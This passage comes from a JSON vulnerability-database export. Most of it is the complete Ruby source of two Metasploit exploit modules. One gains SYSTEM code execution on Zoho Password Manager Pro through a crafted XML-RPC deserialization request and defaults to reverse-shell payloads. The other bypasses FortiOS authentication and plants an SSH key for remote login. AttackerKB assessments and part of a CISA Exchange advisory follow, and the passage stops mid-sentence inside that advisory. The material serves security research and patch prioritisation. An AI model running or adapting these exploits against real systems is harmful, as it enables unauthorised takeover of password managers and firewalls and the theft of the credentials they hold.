vulnerability in Zoho ManageEngine Pro before 12101 and PAM360 before 5510. Unauthenticated attackers can send a crafted XML-RPC request containing malicious serialized data to /xmlrpc to gain RCE as the SYSTEM user.\n", "cvss3": {}, "published": "2022-08-02T16:57:56", "type": "metasploit", "title": "Zoho Password Manager Pro XML-RPC Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2022-08-02T19:27:27", "id": "MSF:EXPLOIT-WINDOWS-HTTP-ZOHO_PASSWORD_MANAGER_PRO_XML_RPC_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::JavaDeserialization\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zoho Password Manager Pro XML-RPC Java Deserialization',\n 'Description' => %q{\n This module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro\n before 12101 and PAM360 before 5510. Unauthenticated attackers can send a\n crafted XML-RPC request containing malicious serialized data to /xmlrpc to\n gain RCE as the SYSTEM user.\n },\n 'Author' => [\n 'Vinicius', # Discovery\n 'Y4er', # Writeup\n 'Grant Willcox' # Exploit\n ],\n 'References' => [\n ['CVE', '2022-35405'],\n ['URL', 'https://xz.aliyun.com/t/11578'], # Writeup\n ['URL', 'https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html'], # Advisory\n ['URL', 'https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm'] # The patch.\n ],\n 'DisclosureDate' => '2022-06-24', # Vendor release date of patch and new installer, as advisory lacks any date.\n 'License' => MSF_LICENSE,\n 'Platform' => ['win'],\n 'Arch' => [ARCH_CMD, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows EXE Dropper',\n {\n 'Arch' => ARCH_X64,\n 'Type' => :windows_dropper,\n 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'Type' => :windows_command,\n 'Space' => 3000,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' }\n }\n ],\n [\n 'Windows Powershell',\n {\n 'Arch' => ARCH_X64,\n 'Type' => :windows_powershell,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp' }\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(7272),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n # Send an empty serialized object\n res = send_request_xmlrpc('')\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n if res.body.include?('Failed to read result object: null')\n return CheckCode::Vulnerable('Target can deserialize arbitrary data.')\n end\n\n CheckCode::Safe('Target cannot deserialize arbitrary data.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :windows_command\n execute_command(payload.encoded)\n when :windows_dropper\n cmd_target = targets.select { |target| target['Type'] == :windows_command }.first\n execute_cmdstager({ linemax: cmd_target.opts['Space'] })\n when :windows_powershell\n execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n res = send_request_xmlrpc(\n generate_java_deserialization_for_command('CommonsBeanutils1', 'cmd', cmd)\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\")\n end\n\n print_good(\"Successfully executed command: #{cmd}\")\n end\n\n def send_request_xmlrpc(data)\n # http://xmlrpc.com/\n # https://ws.apache.org/xmlrpc/\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/xmlrpc'),\n 'ctype' => 'text/xml',\n 'data' => <<~XML\n <?xml version=\"1.0\"?>\n <methodCall>\n <methodName>#{rand_text_alphanumeric(8..42)}</methodName>\n <params>\n <param>\n <value>\n <struct>\n <member>\n <name>#{rand_text_alphanumeric(8..42)}</name>\n <value>\n <serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\">#{Rex::Text.encode_base64(data)}</serializable>\n </value>\n </member>\n </struct>\n </value>\n </param>\n </params>\n </methodCall>\n XML\n )\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-19T22:46:49", "description": "This module exploits an authentication bypass vulnerability in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API to gain access to a chosen account. And then add a SSH key to the authorized_keys file of the chosen account, allowing to login to the system with the chosen account. Successful exploitation results in remote code execution.\n", "cvss3": {}, "published": "2022-10-14T20:19:43", "type": "metasploit", "title": "Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-17T22:51:28", "id": "MSF:EXPLOIT-LINUX-HTTP-FORTINET_AUTHENTICATION_BYPASS_CVE_2022_40684-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::SSH\n prepend Msf::Exploit::Remote::AutoCheck\n\n attr_accessor :ssh_socket\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.',\n 'Description' => %q{\n This module exploits an authentication bypass vulnerability\n in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API\n to gain access to a chosen account. And then add a SSH key to the\n authorized_keys file of the chosen account, allowing\n to login to the system with the chosen account.\n\n Successful exploitation results in remote code execution.\n },\n 'Author' => [\n 'Heyder Andrade <@HeyderAndrade>', # Metasploit module\n 'Zach Hanley <@hacks_zach>', # PoC\n ],\n 'References' => [\n ['CVE', '2022-40684'],\n ['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'],\n ['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'],\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2022-10-10', # Vendor advisory\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'FortiOS',\n {\n 'DefaultOptions' => {\n 'PAYLOAD' => 'generic/ssh/interact'\n },\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'ssh_interact'\n }\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK # SSH key is added to authorized_keys file\n ]\n }\n )\n )\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']),\n OptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]),\n OptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]),\n OptString.new('KEY_PASS', [false, 'SSH private key password', nil]),\n OptString.new('SSH_RPORT', [true, 'SSH port to connect to', 22]),\n OptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true])\n ]\n )\n end\n\n def username\n if datastore['USERNAME']\n @username ||= datastore['USERNAME']\n else\n @username ||= detect_username\n end\n end\n\n def ssh_rport\n datastore['SSH_RPORT']\n end\n\n def current_keys\n @current_keys ||= read_keys\n end\n\n def ssh_keygen\n # ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8`\n if datastore['PRIVATE_KEY']\n @ssh_keygen ||= Net::SSH::KeyFactory.load_data_private_key(\n File.read(datastore['PRIVATE_KEY']),\n datastore['KEY_PASS'],\n datastore['PRIVATE_KEY']\n )\n else\n @ssh_keygen ||= OpenSSL::PKey::EC.generate('prime256v1')\n end\n end\n\n def ssh_private_key\n ssh_keygen.to_pem\n end\n\n def ssh_pubkey\n Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)\n end\n\n def authorized_keys\n pubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)\n \"#{ssh_keygen.ssh_type} #{pubkey} #{username}@localhost\"\n end\n\n def fortinet_request(params = {})\n send_request_cgi(\n {\n 'ctype' => 'application/json',\n 'agent' => 'Report Runner',\n 'headers' => {\n 'Forwarded' => \"for=\\\"[127.0.0.1]:#{rand(1024..65535)}\\\";by=\\\"[127.0.0.1]:#{rand(1024..65535)}\\\"\"\n }\n }.merge(params)\n )\n end\n\n def check\n vprint_status(\"Checking #{datastore['RHOST']}:#{datastore['RPORT']}\")\n # a normal request to the API should return a 401\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),\n 'ctype' => 'application/json'\n })\n\n return CheckCode::Unknown('Target did not respond to check.') unless res\n return CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401\n\n # Trying to bypasss the authentication and get the sshkey from the current targeted user it should return a 200 if vulnerable\n res = fortinet_request({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/system/status')\n })\n\n return CheckCode::Safe unless res&.code == 200\n\n version = res.get_json_document['version']\n\n print_good(\"Target is running the version #{version}, which is vulnerable.\")\n\n Socket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']) { |sock| return CheckCode::Safe('However SSH is not open, so adding a ssh key wouldn\\t give you access to the host.') unless sock }\n\n CheckCode::Vulnerable('And SSH is running which makes it exploitable.')\n end\n\n def cleanup\n return unless ssh_socket\n\n # it assumes our key is the last one and set it to a random text. The API didn't respond to DELETE method\n data = {\n \"ssh-public-key#{current_keys.empty? ? '1' : current_keys.size}\" => '\"\"'\n }\n\n fortinet_request({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/system/admin/', username),\n 'data' => data.to_json\n })\n end\n\n def detect_username\n vprint_status('User auto-detection...')\n res = fortinet_request(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/system/admin')\n )\n users = res.get_json_document['results'].collect { |e| e['name'] if (e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0') }.compact\n # we prefer to use admin, but if it doesn't exist we chose a random one.\n if datastore['PREFER_ADMIN']\n vprint_status(\"PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.\")\n users.include?('admin') ? 'admin' : users.sample\n else\n vprint_status(\"PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random that is not the admin.\")\n (users - ['admin']).sample\n end\n end\n\n def add_ssh_key\n if current_keys.include?(authorized_keys)\n # then we'll remove that on cleanup\n print_good('Your key is already in the authorized_keys file')\n return\n end\n vprint_status('Adding SSH key to authorized_keys file')\n # Adding the SSH key as the last entry in the authorized_keys file\n keystoadd = current_keys.first(2) + [authorized_keys]\n data = keystoadd.map.with_index { |key, idx| [\"ssh-public-key#{idx + 1}\", \"\\\"#{key}\\\"\"] }.to_h\n\n res = fortinet_request({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/system/admin/', username),\n 'data' => data.to_json\n })\n fail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500\n body = res.get_json_document\n fail_with(Failure::UnexpectedReply, 'Unexpected reponse from the server after adding the key.') unless body.key?('cli_error') && body['cli_error'] =~ /SSH key is good/\n end\n\n def read_keys\n vprint_status('Reading SSH key from authorized_keys file')\n res = fortinet_request({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/system/admin/', username)\n })\n fail_with(Failure::UnexpectedReply, 'Failed read current SSH keys') unless res&.code == 200\n result = res.get_json_document['results'].first\n ['ssh-public-key1', 'ssh-public-key2', 'ssh-public-key3'].map do |key|\n result[key].gsub('\"', '') unless result[key].empty?\n end.compact\n end\n\n def do_login(ssh_options)\n # ensure we don't have a stale socket hanging around\n ssh_options[:proxy].proxies = nil if ssh_options[:proxy]\n begin\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\n self.ssh_socket = Net::SSH.start(rhost, username, ssh_options)\n end\n rescue Rex::ConnectionError\n fail_with(Failure::Unreachable, 'Disconnected during negotiation')\n rescue Net::SSH::Disconnect, ::EOFError\n fail_with(Failure::Disconnected, 'Timed out during negotiation')\n rescue Net::SSH::AuthenticationFailed\n fail_with(Failure::NoAccess, 'Failed authentication')\n rescue Net::SSH::Exception => e\n fail_with(Failure::Unknown, \"SSH Error: #{e.class} : #{e.message}\")\n end\n\n fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket\n end\n\n def exploit\n print_status(\"Executing exploit on #{datastore['RHOST']}:#{datastore['RPORT']} target user: #{username}\")\n add_ssh_key\n vprint_status('Establishing SSH connection')\n ssh_options = ssh_client_defaults.merge({\n auth_methods: ['publickey'],\n key_data: [ ssh_private_key ],\n port: ssh_rport\n })\n ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']\n\n do_login(ssh_options)\n\n handler(ssh_socket)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/fortinet_authentication_bypass_cve_2022_40684.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2023-03-02T23:31:59", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at January 10, 2023 2:58pm UTC reported:\n\nCVE-2022-41082, also known as ProxyNotShell is an authenticated RCE in Microsoft Exchange. ProxyNotShell actually combines CVE-2022-41082 and CVE-2022-41040 for the whole attack chain. This CVE specifically however is the RCE component. The vulnerability is a deserialization flaw in Microsoft Exchange\u2019s PSRP backend. The PSRP backend can be accessed by an authenticated attacker leveraging the SSRF flaw identified as CVE-2022-41040. The deserialization gadget was documented by ZDI in their [blog](<https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend>). While this vulnerability affected Exchange Server 2013 and Exchange Server 2016, the gadget chain only worked with Exchange Server 2019 (version 15.2+). A new gadget chain could potentially be developed to exploit these older versions.\n\nGTSC originally announced on September 28th that they had seen a new (at the time) 0-day attack against their customers using Microsoft Exchange. On November 8th, Microsoft released patches for the two vulnerabilities. Between September 28th and November, no public exploits combined the SSRF with the RCE. Private threat actors however were attempting to exploit the vulnerability which led Microsoft to issue Exchange Emergency Mitigation Service (EEMS) mitigations. These mitigations took the form of IIS rewrite rules which were able to be bypassed using encoding techniques. The last issued EEMS mitigation was able to be successfully bypassed by using IBM037v1 encoding, which can be demonstrated using the [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/17275>).\n\nSuccessful code execution results in OS commands running as NT AUTHORITY\\SYSTEM. The exploit is reliable to exploit and pretty quick (compared to ProxyShell which needed to gather a lot of information).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-41082", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-08T00:00:00", "id": "AKB:B18222FB-1EF5-4D55-899B-61BD7ECF0FAA", "href": "https://attackerkb.com/topics/tzpl7qr8m1/cve-2022-41082", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-06T17:35:32", "description": "An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at October 14, 2022 9:39pm UTC reported:\n\nA vulnerability lets you send requests to the backend API service that appear to be coming from a trusted frontend application. As a result, you can call any REST API without authentication, which is pretty bad considering this is a security appliance.\n\n**carlosevieira** at October 10, 2022 5:26pm UTC reported:\n\nA vulnerability lets you send requests to the backend API service that appear to be coming from a trusted frontend application. As a result, you can call any REST API without authentication, which is pretty bad considering this is a security appliance.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-19T00:00:00", "type": "attackerkb", "title": "CVE-2022-40684", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-40684", "CVE-2022-41352"], "modified": "2022-10-19T00:00:00", "id": "AKB:288E3CA7-1388-488A-81D9-E93EDFFAA221", "href": "https://attackerkb.com/topics/QWOxGIKkGx/cve-2022-40684", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-26T14:20:53", "description": "Improper validation of some components used by the rollback mechanism in Trend Micro Apex One and Trend Micro Apex One as a Service clients could allow a Apex One server administrator to instruct affected clients to download an unverified rollback package, which could lead to remote code execution. Please note: an attacker must first obtain Apex One server administration console access in order to exploit this vulnerability.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-19T00:00:00", "type": "attackerkb", "title": "CVE-2022-40139", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-40139"], "modified": "2022-09-19T00:00:00", "id": "AKB:C3925834-0CCF-4765-9D28-EB57DD180308", "href": "https://attackerkb.com/topics/NDnVyP5B2b/cve-2022-40139", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-08T08:02:38", "description": "Zoho ManageEngine Password Manager Pro before 12101 and PAM360 before 5510 are vulnerable to unauthenticated remote code execution. (This also affects ManageEngine Access Manager Plus before 4303 with authentication.)\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 25, 2022 5:15pm UTC reported:\n\nThis was an interesting vulnerability first found by Vinicius, and which then had a nice writeup on how to exploit it published by Y4er at <https://xz.aliyun.com/t/11578>. It was subsequently patched by Zoho and the patch can be found at <https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm>, whilst the advisory can be found at <https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html>.\n\nBy sending a XML-RPC serialized message via a POST request to the `/xmlrpc` endpoint as an unauthenticated user, the specs of which can be found at <http://xmlrpc.com/spec.md>, it is possible to gain RCE as the `SYSTEM` user that Zoho Password Manager runs as. Note that the name of the method being called does not have to be valid, and the name of the parameter passed to that method also does not have to be valid. All that matters is that the value of the parameter is marked as a serializable object that is Base64 encoded. This can be seen in the Metasploit module at <https://github.com/rapid7/metasploit-framework/pull/16852/files#diff-eaa6a1c5246f1059f414cda95a9c5c4e3e1d0adc4373ce64f7165fefe7576ec6R129-R157>\n\nAdditionally, since the target will also respond with `Failed to read result object: null` if you send the endpoint an empty string and its vulnerable to deserialization attacks, it makes it really easy to put together a full exploit for this vulnerability that not only can check if the target is vulnerable but can also reliably exploit it. The last step was to use the CommonsBeanutils1 deserialization chain and then supply the command we want to execute and boom, we can go from an unauthenticated user to SYSTEM remotely and without authentication.\n\nNow what are the implications of this? Well it depends on the product. In the case of ManageEngine Access Manager Plus you need authentication to exploit this issue which may negate some of the risk, however one still needs to consider that successful exploitation will result in high privileged user access. However with Zoho ManageEngine Password Manager Pro and PAM360, no authentication is needed yet you will still get very high privileged user access.\n\nSecondly one needs to consider the position of where these products will be placed in the network. Zoho ManageEngine Password Manager Pro will likely be internally facing as there is likely not a need to make it externally accessible, or if it is it will be accessible via a VPN. On the other hand ManageEngine Access Manager Plus and PAM360 are access management solutions so it is feasible, particularly in the world of remote work that we live in today, that these solutions would be accessible over the internet.\n\nIn the worse case scenario this would mean an unauthenticated attacker could potentially connect to a target server remotely over the internet, and with no authentication get SYSTEM level access on that server, which will also be controlling sensitive operations via access management controls, or will be holding user\u2019s passwords, which could then be used to gain further access into the target network.\n\nMore realistically though is the scenario that these are internally facing and an internal attacker uses this vulnerability to gain control over access management software to avoid detection or grant themselves access to sensitive resources, or steals passwords to gain further access into the target network.\n\nIn either case the risk of this vulnerability is quite high and given the incredibly easy exploitation of this issue combined with known exploited in the wild activity, this should be patched as soon as possible and you should investigate your servers for any suspicious activity if you haven\u2019t patched already.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-19T00:00:00", "type": "attackerkb", "title": "CVE-2022-35405", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2022-11-08T00:00:00", "id": "AKB:7734F7C5-D029-4C2D-9E33-DEBEABF4E7FF", "href": "https://attackerkb.com/topics/9IKNFYh9Wl/cve-2022-35405", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-26T11:04:54", "description": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 15.6.1 and iPadOS 15.6.1, macOS Monterey 12.5.1. An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-24T00:00:00", "type": "attackerkb", "title": "CVE-2022-32894", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-32894"], "modified": "2022-11-03T00:00:00", "id": "AKB:A0C8E5E1-E212-4D46-97F4-2C5A5F8F05F2", "href": "https://attackerkb.com/topics/dGRSfxvIvH/cve-2022-32894", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-18T20:06:15", "description": "Windows COM+ Event System Service Elevation of Privilege Vulnerability.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T00:00:00", "type": "attackerkb", "title": "CVE-2022-41033", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41033"], "modified": "2022-10-11T00:00:00", "id": "AKB:C27C2E8E-E83A-4BF5-A465-C31AC3D7B61B", "href": "https://attackerkb.com/topics/00rqTmp3LP/cve-2022-41033", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-07T17:29:35", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-41040", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-11-08T00:00:00", "id": "AKB:9EA74C88-E0C0-4B13-802D-551307F35B3F", "href": "https://attackerkb.com/topics/jd9xHGqW3a/cve-2022-41040", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-24T23:07:24", "description": "A code injection vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v19.0 MR1 and older.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-23T00:00:00", "type": "attackerkb", "title": "CVE-2022-3236", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-3236"], "modified": "2022-09-23T00:00:00", "id": "AKB:9BEA97BB-44E8-4F50-B014-1DF399424D7C", "href": "https://attackerkb.com/topics/UWv8nSk6YL/cve-2022-3236", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa": [{"lastseen": "2022-10-03T13:58:18", "description": "Microsoft has released [Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). According to the blog post, \u201cMicrosoft is aware of limited targeted attacks using the two vulnerabilities to get into users\u2019 systems.\u201d The two vulnerabilities are CVE-2022-41040 and CVE-2022-41082, affecting on-premises Microsoft Exchange Server 2013, 2016, and 2019. **Note:** Microsoft Exchange Online is not affected. \n\nAn attacker could exploit these vulnerabilities to take control of an affected system.\n\nCISA encourages users and administrators to 